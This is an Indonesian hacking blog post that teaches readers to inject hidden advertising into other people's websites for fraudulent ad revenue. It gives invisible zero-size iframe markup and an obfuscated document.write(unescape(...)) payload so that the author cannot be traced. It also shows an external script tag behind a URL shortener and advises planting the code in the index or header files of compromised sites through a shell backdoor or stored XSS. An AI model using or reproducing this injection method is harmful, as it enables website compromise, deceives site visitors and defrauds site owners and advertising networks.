Hi 👋, halaman kontak kami bukan hanya pajangan :) Pastikan anda tidak menghubungi pihak palsu yg mengatasnamakan kami !!

Table of Content

Advertisement

 
Home
Tutorial
Xploit

Cara Menyisipkan Iklan Tersembunyi dengan JavaScript

memanipulasi iklan di website cara menyisipkan iklan tersembunyi hidden ads hidden ads Injection

Sesuai judul pembahasan kali ini, saya akan menjelaskan bagaimana cara untuk menginjeksi situs lain dengan iklan yang bisa dibilang (multi iklan). Karena kalian bisa memanipulasi sebuah script yang sangat pendek dengan iklan berapapun sebanyak yang kalian mau.

Bayangkan, hanya dengan diam saja, kalian mendapat view iklan valid dari traffic website lain. Enak kan? Apalagi tersembunyi, sehingga pengunjung website tidak sadar dia sedang menambah view iklan kita. langsung saja, scroll kebawah.

1. Siapkan Iklan & Sebuah Halaman Website

Ya jelas dong, kalian harus mempunyai kode iklan dari penyedia layanan pengiklanan. Disini saya mencontohman menggunakan Adsterra. Nah untuk halaman pemasangan iklan Kalian bisa menggunakan penyedia website gratis seperti freewha, 000webhost, website yang kalian miliki, ataupun website yang sudah kalian jajah.

Singkatnya kalian isikan halaman yang sudah kalian siapkan dengan beberapa iklan didalamnya. Saya contohkan pakai blog ini (blogspot.com) seperti halaman berikut.

https://x-ploitech.blogspot.com/p/iklan1.html

2. Gunakan Iframe Tersembunyi

Nah point pentingnya disini, kita akan gunakan Iframe. Buat kamu yang belum tau, iframe adalah Inline Frame, sebuah komponen dari file HTML yang memungkinkan kamu menyematkan video, dokumen, dan file lainnya ke dalam sebuah halaman website.

Kalian buat script seperti berikut dengan link halaman iklan kalian. Kamu bisa menyantumkan lebih dari 1 halaman, disini saya hanya menggunakan 2 halaman supaya website yang kita sisipi iklan tidak terlalu berat. 

<iframe src='https://x-ploitech.blogspot.com/p/iklan1.html' frameborder='0' height='0' width='0'></iframe>
<iframe src='https://x-ploitech.blogspot.com/p/iklan2.html' frameborder='0' height='0' width='0'></iframe>

Ganti url saya dengan url halaman kamu yang sudah ditanami iklan.

3. Enkripsi dan Upload

Yang saya maksudkan disini agar script yang berisi link yang kalian gunakan tidak mudah di ekspose dan ahirnya meninggalkan jejak yang jelas pelakunya adalah kalian. untuk itu kalian bisa mengenkripsi script yang sudah kalian buat pada langkah ke 2 disini www.webtoolhub.com/tn561359-html-encrypter.aspx

Tidak perlu semuanya kalian copy, hanya bagian yang ini saja sudah cukup.

<!--
document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%78%2d%70%6c%6f%69%74%65%63%68%2e%62%6c%6f%67%73%70%6f%74%2e%63%6f%6d%2f%70%2f%69%6b%6c%61%6e%31%2e%68%74%6d%6c%27%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%27%30%27%20%68%65%69%67%68%74%3d%27%30%27%20%77%69%64%74%68%3d%27%30%27%3e%3c%2f%69%66%72%61%6d%65%3e%0d%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%78%2d%70%6c%6f%69%74%65%63%68%2e%62%6c%6f%67%73%70%6f%74%2e%63%6f%6d%2f%70%2f%69%6b%6c%61%6e%32%2e%68%74%6d%6c%27%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%27%30%27%20%68%65%69%67%68%74%3d%27%30%27%20%77%69%64%74%68%3d%27%30%27%3e%3c%2f%69%66%72%61%6d%65%3e'));
//-->

Nah langkah selanjutnya, kalian upload script yang kalian enkripsi tadi dalam format javascript / ekstensi .js ke website yang bisa menghosting javascript seperti beberapa webhosting gratisan yang saya sebutkan diatas ( tidak disarankan di pastebin.com ). Lalu kalian salin linknya kemudian perpendek menjadi seperti berikut. 

<script src='https://api.mycontents.id/ad.js'></script>

Agar tidak terkesan panjang disini saya menggunakan url shortner untuk memendekkan link yaitu https://is.gd. Kenapa tidak menggunakan bit.ly? karena kemarin saya coba muncul alert error, jadi saya menggunakan url shortner lain menjadi seperti ini. 

<script src='https://is.gd/fZmYWf'></script>

Bila terjadi error pada saat memperpendek url kemungkinan domain kalian terblacklist, sehingga tidak perlu memakai url shortner. Cukup dengan link asli javascript yang sudah kalian upload.

4. Tanam

Langkah terahir tinggal kalian tanam pada file index, header, ataupun direktori lainnya yang ada kemungkinan banyak pengunjungnya. Dan tinggal santai santai, trafic iklan tetap berjalan. Daripada cuma jual kerang, lebih baik push iklan. Sebagai contoh dapat kalian lihat pada gambar dibawah.

view-source:https://forum-website.rf.gd
kode berjalan dengan baik dan normal

Untuk menyisipkannya kalian bisa menggunakan kerang / shell backdoor ataupun memanfaatkan celah stored XSS.

Sekian artikel Cara Menyisipkan Iklan Tersembunyi dengan JavaScript, terlepas apapun kegiatan kalian, itu adalah tanggung jawab kalian sendiri. Good Luck.

jack of all technologies, master of none.

This Content is Protected by DMCA.com

DMCA.com Protection Status




Post a Comment

Bijaklah dalam berkomentar, jejak digital itu kejam.
image quote pre
X-PLOITECH By OZHAXID